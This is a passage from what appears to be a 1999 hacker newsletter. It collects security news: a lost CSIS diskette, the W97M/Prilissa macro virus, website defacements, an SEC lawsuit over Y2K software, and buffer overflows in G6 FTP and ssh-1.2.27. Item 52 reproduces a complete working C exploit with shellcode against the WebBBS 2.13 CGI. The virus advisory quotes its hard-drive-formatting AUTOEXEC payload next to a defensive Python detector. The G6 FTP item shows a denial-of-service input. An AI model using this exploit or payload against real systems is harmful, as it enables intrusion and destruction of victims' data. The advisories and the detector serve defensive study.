      "I went into one of the phone booths to make a call and there was a 
      diskette on the shelf. It was just the diskette; there was nothing else. 
      It had obviously fallen out of something because there were quite 
      substantial scratch marks on it," he recalled.

      He looked around for the owner. The library near the phone booth was 
      closed, so he posted a note on the doors, saying: "Disk found, please call 
      . . ."

      He went home and waited for a reply. Curious, he shoved the unmarked 
      diskette into his computer.

      "I thought, 'Maybe there is something in here that identifies who this 
      belongs to,' " the man said.

      He opened the document using his computer's word-processing software and 
      was shocked by what popped up on his screen.

      "It came up without any conversion. It just opened right up; it wasn't 
      password protected and [as] I started scanning through this stuff there 
      was a large quantity of clearly sensitive information. Quite frankly, I 
      thought at first it was just an elaborate practical joke. It was a whole 
      bunch of cloak-and-dagger stuff."

      He kept reading the uncoded documents. There were between eight and 12 in 
      total, each about four pages in length. He only read three or four 
      documents, he said.

      He said he considered selling the diskette to one of CSIS's targets, who 
      was identified in the documents.

      "I briefly toyed with the possibility of seeing who would buy this for the 
      highest bid. I do know there were names there, and I thought, 'Hey, what 
      if I give this person a call and say: Do you know what CSIS has on you?' I 
      abandoned the idea. I figured I could get myself in a lot of trouble that 
      way."

      He tried to make a copy of the diskette but realized that the information 
      had not been transferred.

      In mid-August, he picked up the phone and called CSIS in Toronto.

      "I didn't know who CSIS was. So I just looked them up in the phone book 
      and I called them up."

      He described his find to a CSIS officer. A few hours later, H. N. (Harry) 
      Southern, the agency's head of internal security, arrived at the man's 
      home office in downtown Toronto.

      The following day, CSIS called back and said they wanted to pay him 
      another visit. This time, two agents dropped by: Angela Jones and Mr. 
      Southern.

      They began to question him about "everything I knew about this," he said.

      CSIS knew that he had told friends about his diskette adventure.

      "They asked me: 'Did you make any copies of it?' and I said that I didn't 
      make any printouts but I had made a copy of the diskette, but when I tried 
      to open it, I couldn't read it. They took my word on it and never asked me 
      for the copy," the man recalled.

      The agents asked him not to tell anyone about the lost diskette.

      "They were extremely uncomfortable. They were very ill at ease, very 
      embarrassed. It's an organization that's supposed to be top secret. And I 
      think it was uncomfortable for them to go to a Joe on the street like me 
      and ask him how he managed to just find in a phone booth these kind of 
      documents," he said.

      The pair of agents paid him a third visit after they learned that he knew 
      a journalist who worked in Toronto for The Christian Science Monitor 
      newspaper. The same agents later paid a visit to the journalist and his 
      wife and peppered them with questions about what they knew about what was 
      on the diskette.

      He said the agents told him they were getting a lot of heat from their 
      spymasters, who were anxious that his find not hit the front pages of 
      newspapers in Canada.

      The man, who works as an administrator in Toronto, asked the CSIS agents 
      for money in return for his silence. They refused.

      He had some harsh words for the agency.

      "I told them if things are as unprofessional as they seem, maybe it would 
      be good if a little heat was put under some people. They said: 'Believe me, 
      there is some heat being put under some people,' " he said.

      He was not threatened. "They were very meek," he said.

      Former CSIS officer Peter Marwitz said the case of the missing diskette is 
      known widely within the service and is a sore point for many veteran 
      officers who think carelessness on this scale should have been a firing 
      offence.

      The veterans, Mr. Marwitz said recently, believe the careless officer in 
      the 1996 incident went unpunished because "she brazenly defied her 
      challenger, reminding the service that she was a woman and a minority."

      The SIRC, the watchdog committee that reports to Parliament, made an 
      oblique reference to the 1996 incident in one of its published audits.

      Procedures were changed after the incident so that an officer moving from 
      headquarters to a regional office isn't required to carry data physically 
      on computer diskettes, federal sources said.

      Officers can now transfer their computer network data accounts to the new 
      location and sign on to the network and get access to any of the files 
      they are authorized to see, the sources said.

      CSIS spokesman Dan Lambert said the service will neither confirm nor deny 
      details of the lost-diskette episode. He said an internal investigation is 
      still under way in the case of the employee who lost the operational 
      planning document while at the hockey game.

      Meanwhile, Solicitor-General Lawrence MacAulay, the federal minister 
      responsible for both CSIS and the RCMP, confirmed that the Mounties lost a 
      briefcase containing sensitive documents in British Columbia in 1995.

      But he said RCMP Commissioner Philip Murray assured him that the loss did 
      not pose a threat to national security.

      Opposition parties blasted Mr. MacAulay for the third day running 
      yesterday for his failure to immediately notify the SIRC, the review 
      committee, upon learning of the incident at the hockey game.

       "People . . . need to know that these departments are not leaking like 
       sieves," Reform MP Jim Abbott said.
       
       @HWA

44.0  Hitachi Chip May Prevent Use of Third-party Printer Cartridges 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      New technology being developed by Hitachi may prevent
      people from using third party printer cartridges. By
      embedding chips similar to those in hotel keys or smart
      cards into toner or ink cartridges Hitachi could prevent
      customers from using third-party cartridges. Hitachi is
      planning on incorporating this technology into laser
      printers and copiers it markets in Japan and is currently
      in negotiations with several US companies to license the
      technology. 

      PC World   
      http://www.pcworld.com/pcwtoday/article/0,1510,13897,00.html
      
      Smart Cards May Secure Peripherals 

      Hitachi previews chips that could ID pirated music
      or third-party printer cartridges.

      by Martyn Williams, IDG News Service 
      November 18, 1999, 1:30 p.m. PT 

      LAS VEGAS -- Hitachi Maxell is previewing at Comdex
      here a prototype chip being eyed by laser printer and
      copier makers as a way to stop customers from using
      third-party toner cartridges.

      The new chip is a development of proximity smart
      cards already on the market. Smart cards are widely
      used in applications like hotel door keys and telephone
      cards, and can exchange data when brought within a
      few millimeters of a reader.

      At just 2.3 mm square, the chips greatly cut down on
      the space needed for the devices that use them.

      The chip supports a 32-bit key and may also find its
      way into an antipiracy device to protect CD- or
      DVD-based media. If a disk lacked the chip, the player
      would refuse to accept it.

      Hitachi already plans to build card readers into the
      laser printers and copiers it markets in Japan. With the
      chips embedded into toner cartridges, printers can
      reject cartridges that don't carry the chip. This could kill
      the third-party toner business in Japan, but it's not
      clear whether U.S. law would permit the same tactic,
      says Masaaki Chino, manager of Hitachi Maxell's
      smart card projects. 

      "If they include this reader board into the copy machine
      and this chip into the cartridge, they can control which
      cartridges are used," Chino says.

      Nevertheless, Hitachi is already talking to several major
      U.S. vendors regarding the technology, although Chino
      declined to name them. Hitachi supplies laser printer
      and copier engines to NEC, Brother, and Minolta.

      At Comdex, Hitachi is also showing an application in
      which the chips are loaded with a URL and embedded
      into vendors' promotional material. When the brochures
      are near a dedicated reader for personal computers, the
      company's Web site appears inside the browser
      running on the PC.

      The current implementation, which requires a
      stand-alone reader, is a little clunky, Chino
      acknowledges. But Hitachi is talking with several PC
      vendors, including Sharp, about building the readers
      into computers. 
      
      @HWA
      
45.0  NEW MACRO VIRUS OUT THERE
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Saturday 20th November 1999 on 2:13 pm CET
      Anti-virus researchers at Network Associates Inc. said Friday that
      10 Fortune 500 companies on three continents have been hit with a
      new virus called W97/Prilissa. Prilissa is a nasty variant on two
      better known attacks -- the Melissa worm and the PRI virus. The
      virus depends on the Windows 95 and 98 operating systems and the
      Word 97 word processing application.
      Link: NAI
      
      http://vil.nai.com/vil/vm10441.asp
      

      Virus Name: W97M/Prilissa 

      Date Added: 11/17/99 

      Virus Characteristics: This is a virus for Word 97 documents. It is able to 
      replicate under the SR-1 release of Word 97. It will turn off the macro 
      warning feature of Word 97. This virus uses the "ThisDocument" stream, or 
      class module, of a document or template during infection routine. It is a 
      copy-cat of the W97M/Melissa.a virus and there is a payload to send the 
      infected file via MS Outlook. Another payload exists for this virus which 
      is date activated - December 25th - to reformat the hard drive (on Windows 
      9x systems) and also overlay the active document with random shapes. Due to 
      this overlay activation which is a copied technique of the W97M/Pri virus, 
      the name is a combination of W97M/Melissa and W97M/Pri, hence 
      W97M/Prilissa. 
 
      This virus hooks the system event of opening documents in Word97 by the 
      subroutine "Document_Open" thereby running its code. Another system event 
      hooked is the closing of documents due to the subroutine "Document_Close" 
      in the global template after infection. 
 
      This virus checks for the existence of a registry key, a self-check to 
      verify if the local system has already been infected. The key is: 
 
      "HKEY_CURRENT_USER\Software\Microsoft\Office\" "CyberNET"="(C)1999 - 
      Indonesia by AnomOke!" 
 
      If this key is not found, the virus code uses VBA instructions to create a 
      MS Outlook email message with the subject line "Message From " (Office97 
      UserName) and a message body of "This document is very Important and you've 
      GOT to read this !!!". The first 50 listings from all available address 
      books are selected as the recipient - the message is then sent with an 
      attachment of the infected document. Lastly, the virus code creates the 
      registry key. 
 
      If this key does exist, the email propagation is not repeated. 
 
      If the date is December 25th (any year), the virus runs a destructive 
      payload to overwrite the existing C:\AUTOEXEC.BAT file with the following 
      instructions: "@echo off" "@echo Vine...Vide...Vice...Moslem Power Never 
      End..." "@echo Your Computer Have Just Been Terminated By -= CyberNET =- 
      Virus !!!" "ctty nul" "format c: /autotest /q /u" 
 
      Since the AUTOEXEC.BAT is not used on Windows NT, this payload is not 
      applicable to that operating system. The next reboot of the computer will 
      run the AUTOEXEC.BAT file causing an unconditional automated format of the 
      hard drive. 
 
      Also, a message box is displayed within Word97 with the following text: 
 
      (C) 1999 - CyberNET Vine... Vide... Vice...Moslem Power Never End... You 
      Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!! 
      [OK] 
 
      After clicking on the OK dialogue box, a random number of randomly colored 
      and random size and type objects fill the document as an overlay. Another 
      virus which uses this overlay is the W97M/Pri virus.
 
      Indications Of Infection: Macro warning if opening infected document, 
      increase in size to global template. Messages on screen as mentioned above. 
      Email propagation as mentioned above. 

      Method Of Infection: Opening infected documents will infect global template 
      normal.dot. 

      EXTRA Drivers: VirusScan 4 with the 4.0.25 engine (and above); Dr. 
      Solomon's AVTK 7.99 and above; VirusScan 3 with the 3.2.2 engine. 
 
      Virus Information
 
          Discovery Date: 11/17/99
 
                  Type:   Macro
 
         Risk Assessment: Medium On Watch
 
           Minimum DAT:   4054 (Available 12/2/99)
 
 
      Variants: Several 
 
      Aliases
      W97M/Melissa.w, Melissa.w, W97M/Prilissa, W97M/Pri.q, WM97/Melissa-ag,
      Melissa 
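
      One way to check a Windows 9x machine for the indicators listed in the
      description above, as an added example that is not part of the NAI
      write-up: it parses a REGEDIT4 export of HKEY_CURRENT_USER and the text
      of C:\AUTOEXEC.BAT. The function names, verdict labels and sample inputs
      are constructed for illustration.

```python
import re

# Indicators quoted in the NAI description above.
MARKER_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "CyberNET"
MARKER_DATA = "(C)1999 - Indonesia by AnomOke!"

_SECTION = re.compile(r"^\[(.+)\]$")
_STRING_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# An active (not REM'd or echoed) unattended format of any drive.
_FORMAT = re.compile(r"^\s*@?\s*format(?:\.com)?\s+[a-z]:.*/autotest\b", re.I)


def _norm_key(path):
    # Registry paths are case-insensitive; the write-up shows a trailing "\".
    return path.rstrip("\\").lower()


def _unescape(text):
    # .reg string data escapes backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", text)


def parse_reg_export(text):
    """Return {normalised_key: {value_name: data}} for string values only."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        section = _SECTION.match(line)
        if section:
            current = keys.setdefault(_norm_key(section.group(1)), {})
            continue
        value = _STRING_VALUE.match(line)
        if value and current is not None:
            current[_unescape(value.group(1))] = _unescape(value.group(2))
    return keys


def check_registry(reg_text):
    """Look for the self-check value the macro writes after its mail run."""
    values = parse_reg_export(reg_text).get(_norm_key(MARKER_KEY), {})
    for name, data in values.items():
        if name.lower() == MARKER_NAME.lower():  # value names ignore case
            return {"present": True, "exact_data": data == MARKER_DATA,
                    "data": data}
    return {"present": False, "exact_data": False, "data": None}


def check_autoexec(bat_text):
    """Return (line_number, line) for each active unattended format command."""
    return [(n, line.strip())
            for n, line in enumerate(bat_text.splitlines(), 1)
            if _FORMAT.search(line)]


def triage(reg_text, bat_text):
    marker = check_registry(reg_text)
    format_lines = check_autoexec(bat_text)
    if format_lines:
        verdict = "DO-NOT-REBOOT"   # next boot would run the format
    elif marker["present"]:
        verdict = "INFECTED"        # macro ran; the mail run already happened
    else:
        # Not proof of a clean host: the write-up lists several variants.
        verdict = "NO-INDICATORS"
    return {"verdict": verdict, "marker": marker, "format_lines": format_lines}


# Constructed sample inputs (not captured from a real machine).
SAMPLE_REG_INFECTED = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"CyberNET"="(C)1999 - Indonesia by AnomOke!"
'''
SAMPLE_REG_CLEAN = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Constructed"="1"
'''
SAMPLE_BAT_STAGED = "@echo off\nctty nul\nformat c: /autotest /q /u\n"
SAMPLE_BAT_CLEAN = "@echo off\nrem format c: /autotest (commented out)\n"

if __name__ == "__main__":
    for label, reg, bat in [
        ("payload staged", SAMPLE_REG_INFECTED, SAMPLE_BAT_STAGED),
        ("marker only", SAMPLE_REG_INFECTED, SAMPLE_BAT_CLEAN),
        ("neither", SAMPLE_REG_CLEAN, SAMPLE_BAT_CLEAN),
    ]:
        print(label, "->", triage(reg, bat)["verdict"])
```
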

      @HWA 
      
46.0  GLOBALNET, CROATIAN ISP COMPROMISED
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Thursday 18th November 1999 on 3:13 pm CET
      Second largest Croatian ISP - Globalnet, was penetrated yesterday
      evening, and the main site was changed. Defacement and the link
      lead to Croatian web pages.
      Link: Monitor      
      
      http://security.monitor.hr
      
      @HWA
      
47.0  SEC FILES CHARGES
      ~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ Thursday 18th November 1999 on 3:05 pm CET
      A Denver-based software company misrepresented the capabilities
      of its software intended to fix Year 2000 computer problems and filed
      false earnings claims, according to a suit filed by the Securities and
      Exchange Commission against the firm and three of its executives.
      Link: News.com      
      
      http://news.cnet.com/news/0-1009-200-1451624.html?tag=st.ne.1009.thed.1009-200-1451624
      
      SEC files suit against Y2K toolmaker 
      By Erich Luening
      Staff Writer, CNET News.com
      November 17, 1999, 6:55 a.m. PT 

      A Denver-based software company misrepresented the capabilities of its 
      software intended to fix Year 2000 computer problems and filed false 
      earnings claims, according to a suit filed by the Securities and Exchange 
      Commission against the firm and three of its executives.

      The suit, believed to be the first to charge that a software maker 
      overstated the capabilities of a Year 2000 repair tool, alleges that from 
      1997 through 1999, Accelr8, its chief executive Thomas Geimer, president 
      Harry Fleury and controller James Godkin made false claims about the 
      utility of its Navig8 2000 software, Reuters reported. 

      The executives are also accused of submitting false financial reports to 
      the SEC during a one-year period that ended April 1999, according to the 
      suit filed in federal court in Denver. 

      The SEC's action seeks an injunction against future violations of the 
      reporting and anti-fraud provision of the federal securities law. 

      The SEC alleges Navig8 2000 was created to analyze computer programs only 
      for the VAX/VMS computer system made by Digital Equipment, which was 
      bought by Compaq Computer in 1998. The company claimed the software 
      addressed Y2K issues for IBM and Microsoft products as well, according to 
      the suit. The company's lawyers dispute the charges, saying Accelr8 has 
      always properly represented the capabilities of its products and feels its 
      accounting practices are appropriate. 

      "We have a dispute with the SEC about the proper application of accounting 
      standards," Simon Krauss, Accelr8's corporate counsel, said in a 
      statement. "Our auditors and a former SEC accounting expert hired by us as 
      a consultant have concurred in the reasonableness of our accounting 
      decisions. Unfortunately, the SEC has the power to claim that anyone with 
      whom they disagree has committed fraud, and has done so in this case." 

      No trial date has been set. 
      
      @HWA
      
48.0  G6 FTP SERVER v2.0 PROBLEMS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 6:31 pm CET
      UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0
      (beta 4/5). The buffer overflow is caused by a long user name with
      2000 characters. G6FTP starts to do infinite loops in the main
      program, and starts eating all memory and all computer resources.
      Link: UssrLabs
      
      http://www.ussrback.com/g6ftp/
      
      beta 4/5 Vulnerability
       
                                                     
      G6 FTP Server v2.0 


                                                
      PROBLEM 

      UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5), 

      The buffer overflow is caused by a long user name, 2000 characters. G6FTP
      starts to do infinite loops in the main program, and starts eating all memory 
      and all computer resources, CPU 100%; at the moment of no more memory, if this
      happens, ALL the system is down :( 

      Example: 


      [gimmemore@itsme]$ telnet example.com 21 
      Trying example.com... 
      Connected to example.com. 
      Escape character is '^]'. 
     
      220-G6 FTP Server v2.0 (beta 5) ready ... 
      USER {buffer} 
      Where buffer is 2000 characters. 


      Vendor Status:  Not Contacted 
      Vendor Url: http://www.gene6.com/ 
      Program Url: http://www.gene6.com/g6ftpd/download.html 
      Credit: USSRLABS 
      SOLUTION: Nothing yet. 
     
      u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h 

      
      @HWA
      
49.0  RED HAT SECURITY ADVISORY
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ Wednesday 17th November 1999 on 6:22 pm CET
      The length of a path name was not checked on the removal of a
      directory. If a long enough directory name was created, the buffer
      holding the pathname would overflow, and the possibility exists that
      arbitrary code could be executed as the user the NFS server runs as
      (root). Exploiting this buffer overflow does require read/write access
      to a share on an affected server
      Link: Security Focus
      
      http://www.securityfocus.com
      
      @HWA
      
50.0  HPING
      ~~~~~
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 6:00 pm CET
      Hping is a software to do TCP/IP stack auditing, to uncover firewall
      policy, to scan TCP ports in a lot of different modes, to transfer files
      across a firewall, test network performance, test if TOS is handled,
      etc.
      Link: Antirez        
      
      http://www.kyuzz.org/antirez/hping2.html
      
      @HWA
      
51.0  RPM UPDATE HELPING UTILITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ Wednesday 17th November 1999 on 6:17 pm CET
      Rhupdmgr is a script which sends an email to the sysadmins when
      a machine has fallen out of sync with the RedHat Updates. It works
      by checking a generated list of RPMs to be updated.
      Link: Packet Storm
      
      http://packetstorm.securify.com/linux/admin/rhupdmgr-0.4.tar.gz
      
      @HWA
      
52.0  WebBBS Ver2.13 Exploit / Shadow Penguin Security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 5:56 pm CET
      At the initial authorization handling of WebBBS, if a long login
      name or password has been received, this CGI overflows. This
      overflow is used to execute any instructions which are included in
      the user name and password.
      Link: Packet Storm      
      
      http://packetstorm.securify.com/9911-exploits/ex_webbbs.c
      
      /*=============================================================================
         WebBBS Ver2.13 Exploit
         The Shadow Penguin Security (http://shadowpenguin.backsection.net)
         Written by UNYUN (shadowpenguin@backsection.net)
        =============================================================================
      */
      
      #include    <stdio.h>
      #include    <string.h>
      #include    <windows.h> 
      #include    <winsock.h>
      
      #define     HEAD1 \
      "POST /scripts/webbbs.exe HTTP/1.1\r\n"\
      "Accept: application/msword, application/vnd.ms-excel, image/gif, "\
      "image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"\
      "Accept-Language: ja\r\n"\
      "Content-Type: application/x-www-form-urlencoded\r\n"\
      "Accept-Encoding: gzip, deflate\r\n"\
      "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"\
      "Host: 192.168.0.100\r\n"\
      "Content-Length: 106\r\n"\
      "Connection: Keep-Alive\r\n\r\n"\
      "uid=&upw="
      
      #define     HEAD2 "&JOB=TOP&\r\nsub=+%83%8D%83O%83C%83%93+\r\n"
      
      
      #define     HTTP_PORT       80
      #define     MAXBUF          80
      #define     RETADR          48
      #define     JMPESP_1        0xff
      #define     JMPESP_2        0xe4
      #define     NOP             0x90
      #define     KERNEL_NAME     "kernel32.dll"      
      
      
      unsigned char jmp_code[100]={
      0x8B,0xDC,0x33,0xC0,0xB0,0x23,0xC1,0xE0,
      0x10,0x66,0xB8,0x97,0xD9,0x2B,0xD8,0xFF,
      0xE3,0x00
      };
      
      unsigned char exp_code[100]={
      0x33,0xC0,0x50,0x50,0xB0,0x12,0x50,0x66,
      0xB8,0xFF,0xFF,0x50,0xB8,0xb8,0x58,0xf5,
      0xbf,0xff,0xd0,0x50,0x50,0xB8,0x2c,0x23,
      0xf5,0xbf,0xff,0xd0,0x00
      };
      
      main(int argc,char *argv[])
      {
          SOCKET               sock;
          SOCKADDR_IN          addr;
          WSADATA              wsa;
          WORD                 wVersionRequested;
          unsigned int         i,kp,ip;
          static unsigned char buf[MAXBUF],buf2[1000],buf3[1000],*q;
          struct hostent       *hs;
          MEMORY_BASIC_INFORMATION meminfo;
      
          if (argc<2){
              printf("usage: %s VictimHost\n",argv[0]);
              exit(1);
          }
          if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
              printf("Can not find %s\n",KERNEL_NAME);
              exit(1);
          }
      
          VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); 
          ip=0;
          for (i=0;i<meminfo.RegionSize;i++){
              ip=kp+i;
              if ( ( ip     &0xff)==0
                || ((ip>>8 )&0xff)==0
                || ((ip>>16)&0xff)==0
                || ((ip>>24)&0xff)==0) continue;
              q=(unsigned char *)ip;
              if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
          }
          printf("RETADR  : %x\n",ip);
          if (ip==0){
              printf("Can not find codes which are used by exploit.\n");
              exit(1);
          }
      
          wVersionRequested = MAKEWORD( 2, 0 );
          if (WSAStartup(wVersionRequested , &wsa)!=0){
              printf("Winsock Initialization failed.\n"); return -1;
          }
          if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
              printf("Can not create socket.\n"); return -1;
          }
          addr.sin_family     = AF_INET;
          addr.sin_port       = htons((u_short)HTTP_PORT);
          if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
                  if ((hs=gethostbyname(argv[1]))==NULL){
                      printf("Can not resolve specified host.\n"); return -1;
                  }
                  addr.sin_family = hs->h_addrtype;
                  memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
          }
          if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
              printf("Can not connect to specified host.\n"); return -1;
          }
          memset(buf,NOP,MAXBUF); buf[MAXBUF]=0;
          strncpy(buf,exp_code,strlen(exp_code));
      
          buf[RETADR  ]=ip&0xff;
          buf[RETADR+1]=(ip>>8)&0xff;
          buf[RETADR+2]=(ip>>16)&0xff;
          buf[RETADR+3]=(ip>>24)&0xff;
      
          strncpy(buf+RETADR+4,jmp_code,strlen(jmp_code));
          
          send(sock,HEAD1,strlen(HEAD1),0);
          send(sock,buf,strlen(buf),0);
          send(sock,HEAD2,strlen(HEAD2),0);
          closesocket(sock);
          printf("Done.\n");
          return FALSE;
      }
      
      @HWA

53.0  SENATE.GOV BITES THE DUST
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 5:14 pm CET
      One of the web sites on stat.gov was defaced earlier today.
      meetingout.senate.gov was hit, and the main page changed
      with: "rackmount. the 19-inch warrior. now available in 1u, 2u, and
      4u flavors. shouts to [sSh]. good fellaz".
      Link: Attrition
      
      http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov/
      
      @HWA
      
      
54.0  NEW NESSUS
      ~~~~~~~~~~
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 5:09 pm CET
      Nessus is a free, open-sourced and up-to-date remote security
      scanner for Linux, BSD, Solaris and some other systems. It is
      multithreaded, plugin-based, has a nice GTK interface and currently
      performs over 270 remote security checks.
      Link: The Nessus Project
      
      http://www.nessus.org/
      
      @HWA
      
55.0  DELEGATE
      ~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ Wednesday 17th November 1999 on 5:04 pm CET
      Delegate, a multiple-service proxy server contains several hundred
      buffer overflows and is horribly insecure in general. There is a
      demonstration exploit for just one remotely exploitable buffer
      overflow for delegate, compiled on linux.
      Link: Teso
      
      http://teso.scene.at/
      
      @HWA
      
56.0  SSH PROBLEMS
      ~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ Wednesday 17th November 1999 on 4:23 pm CET
      A remotely exploitable buffer overflow has been found in ssh-1.2.27.
      The problem is the length of the session key is not checked.
      Multiple platforms are vulnerable.
      Link: Packet Storm
      
      http://packetstorm.securify.com/9911-exploits/ssh-1.2.27.txt
      
      -------------------------------------------------------------------
      Periodically, the moderator of the vuln-dev mailing list will post
      summaries of issues discussed there to Bugtraq and possibly other relevant
      lists.  This will usually happen when an issue has been resolved, or it
      appears that there will be no further discussion on vuln-dev.  Each
      separate issue will be given its own posting to facilitate referencing
      them separately, for discussion, forwarding, or appearance in vulnerability
      databases.
      
      To subscribe to vuln-dev, send an e-mail to listserv@securityfocus.com,
      with SUBSCRIBE VULN-DEV in the body of the message.
      
      A FAQ and archive can be found at www.securityfocus.com-->forums-->vuln-dev
      (click on these sections, the web pages are forms-based.)
      -------------------------------------------------------------------
      
      There appears to be a serious vulnerability in ssh 1.2.27.  I will let the
      folks who worked on this issue describe.  There was brief discussion on
      vuln-dev on the politics of ssh 1 vs. ssh 2, etc...  you may or may not
      want to play that out on Bugtraq.  One of the key points of the SSH 1 vs.
      SSH 2 debate is regarding licensing.  Basically, because of a less strict
      license on SSH 1, more folks are likely to be running that version.  (This
      is all referring to the Datafellows implementation that everyone uses,
      rather than standards and protocols, I presume.)
      
      As usual, check the vuln-dev archives if you want the full story.  This
      isn't necessarily a dead topic there yet, but this issue should get out
      there sooner rather than later.
      
                                              BB
      
      -------------------------------------------------------------------
      
      To:         Exploit-Dev
      Subject:    ssh-1.2.27 remote buffer overflow - exploitable
      Date:       Mon Nov 08 1999 16:48:53
      Author:     Frank
      Message-ID: <19991109014853.3239.qmail@securityfocus.com>
      
      This is submitted to the Freebsd bug tracking system, although there are
      doubtless other vendors who leave this package, despite the existence of
      the ssh-2.X.   While Debian appears to be immune, I was able to crash my
      ssh daemon (much to my dismay), and there appears the potential to execute
      arbitrary code, as long as you encrypt it first...
      
      Here is the freebsd report.. it describes the method to crash a remote Ssh
      daemon (let's hope you ran sshd from your xinetd, etc).
      
      http://www.freebsd.org/cgi/query-pr.cgi?pr=14749
      
      -------------------------------------------------------------------
      
      To:           Exploit-Dev
      Subject:      Re: ssh-1.2.27 remote buffer overflow - exploitable
      Date:         Mon Nov 08 1999 21:04:19
      Author:       Daniel Jacobowitz
      Message-ID:   <19991109110419.A29502@drow.res.cmu.edu>
      
      <SNIP>
      Debian is immune for the (somewhat messy) reasons that they do not link
      ssh to rsaref, last time that I checked.
      <SNIP>
      
      -------------------------------------------------------------------
      
      To:           Exploit-Dev
      Subject:      Re: ssh-1.2.27 remote buffer overflow - exploitable
      Date:         Mon Nov 08 1999 21:24:17
      Author:       Daniel Jacobowitz
      Message-ID:   <19991109112417.A30046@drow.res.cmu.edu>
      
      <SNIP>
      And here's a patch.  Not tested, as I don't use the rsaref glue on any
      machine here.
      <SNIP>
      
      Ed: Patch can be found at:
      
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-08
      &msg=19991109112417.A30046@drow.res.cmu.edu
      
      -------------------------------------------------------------------
      
      To:          Exploit-Dev
      Subject:     Re: ssh-1.2.27 remote buffer overflow - exploitable
      Date:        Tue Nov 09 1999 04:42:16
      Author:      Jochen Bauer
      Message-ID:  <19991109124216.A28812@luna.theo2.physik.uni-stuttgart.de>
      
      I've taken a closer look at the problem. Here's my analysis:
      
      In sshd.c, around line 1513 the client-generated session key,
      that has been encrypted with the server and host public keys,
      is received from the client as a multiple precision integer.
      
      /* Get the encrypted integer. */
        mpz_init(&session_key_int);
        packet_get_mp_int(&session_key_int);
      
      The encrypted session key is then (around line 1525) passed
      to rsa_private_decrypt to do the first part of the decryption,
      which is either decryption using the server private key or
      decryption using the host private key, depending on which key
      has the larger modulus.
      
      rsa_private_decrypt(&session_key_int, &session_key_int,
                                &sensitive_data.private_key);
      
      If RSAREF is used (i.e. RSAREF is defined in the code), the
      rsa_private_decrypt function in rsaglue.c (around line 162)
      looks like:
      
      void rsa_private_decrypt(MP_INT *output, MP_INT *input, RSAPrivateKey *key)
      {
        unsigned char input_data[MAX_RSA_MODULUS_LEN];
        unsigned char output_data[MAX_RSA_MODULUS_LEN];
        unsigned int input_len, output_len, input_bits;
        [...]
        input_bits = mpz_sizeinbase(input, 2);
        input_len = (input_bits + 7) / 8;
        gmp_to_rsaref(input_data, input_len, input);
        [...]
      }
      
      The trouble spot is the fixed length buffer
      input_data[MAX_RSA_MODULUS_LEN]. A pointer to this buffer is
      passed to the conversion function gmp_to_rsaref along with a
      pointer to the encrypted session key and the length (input_len)
      of the encrypted session key, which may be greater than
      [MAX_RSA_MODULUS_LEN]. gmp_to_rsaref (located around line 79 of
      rsaglue.c) simply calls mp_linearize_msb_first(buf, len, value).
      
      void gmp_to_rsaref(unsigned char *buf, unsigned int len, MP_INT *value)
      {
        mp_linearize_msb_first(buf, len, value);
      }
      
      mp_linearize_msb_first is contained in mpaux.c around line 41.
      The function looks like:
      
      void mp_linearize_msb_first(unsigned char *buf, unsigned int len,
                                  MP_INT *value)
      {
        unsigned int i;
        MP_INT aux;
        mpz_init_set(&aux, value);
        for (i = len; i >= 4; i -= 4)   <-------
          {
            unsigned long limb = mpz_get_ui(&aux);
            PUT_32BIT(buf + i - 4, limb);   <-------
            mpz_div_2exp(&aux, &aux, 32);
          }
        [...]
      }
      
      There's the overflow! len is the length of the encrypted session
      key, while buf is a pointer to the fixed length buffer
      input_data[MAX_RSA_MODULUS_LEN] and no check whether len is
      greater than MAX_RSA_MODULUS_LEN is performed. The fix should be
      obvious!
      
      About the possible exploit:
      
      In this particular overflow, the encrypted, client generated session
